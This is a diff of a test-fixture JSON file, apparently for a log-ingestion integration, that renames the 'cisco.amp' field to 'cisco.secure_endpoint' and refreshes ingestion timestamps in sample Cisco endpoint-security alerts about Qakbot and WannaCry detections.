                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T12:27:42.000Z",
@@ -933,7 +933,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1002,7 +1002,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452493688Z",
+                "ingested": "2021-09-27T00:42:26.818502467Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
@@ -1013,7 +1013,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1066,13 +1066,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:07:55.452495638Z",
+                "ingested": "2021-09-27T00:42:26.818504268Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583861114428195000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1138,7 +1138,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-13T18:07:55.452497572Z",
+                "ingested": "2021-09-27T00:42:26.818506022Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -1149,7 +1149,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1234,7 +1234,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452499476Z",
+                "ingested": "2021-09-27T00:42:26.818507758Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1245,7 +1245,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Auto.A280012EEE.in10.tht.Talos",
                     "computer": {
                         "active": true,
@@ -1311,7 +1311,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452501462Z",
+                "ingested": "2021-09-27T00:42:26.818509604Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -1321,7 +1321,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1382,7 +1382,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452503367Z",
+                "ingested": "2021-09-27T00:42:26.818511367Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1392,7 +1392,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1478,7 +1478,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452505304Z",
+                "ingested": "2021-09-27T00:42:26.818513110Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1489,7 +1489,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1580,7 +1580,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452507280Z",
+                "ingested": "2021-09-27T00:42:26.818514857Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1591,7 +1591,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1657,7 +1657,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452509223Z",
+                "ingested": "2021-09-27T00:42:26.818516593Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -1667,7 +1667,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1721,13 +1721,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:07:55.452511138Z",
+                "ingested": "2021-09-27T00:42:26.818518318Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583853374897127000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1788,7 +1788,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452575444Z",
+                "ingested": "2021-09-27T00:42:26.818520176Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
@@ -1799,7 +1799,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1869,7 +1869,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452580334Z",
+                "ingested": "2021-09-27T00:42:26.818522003Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
@@ -1880,7 +1880,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1945,7 +1945,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452582349Z",
+                "ingested": "2021-09-27T00:42:26.818523760Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1955,7 +1955,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2026,7 +2026,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452584295Z",
+                "ingested": "2021-09-27T00:42:26.818525503Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2037,7 +2037,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.FCE5B6784D-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2099,7 +2099,7 @@
             },
             "event": {
                 "severity": 2,
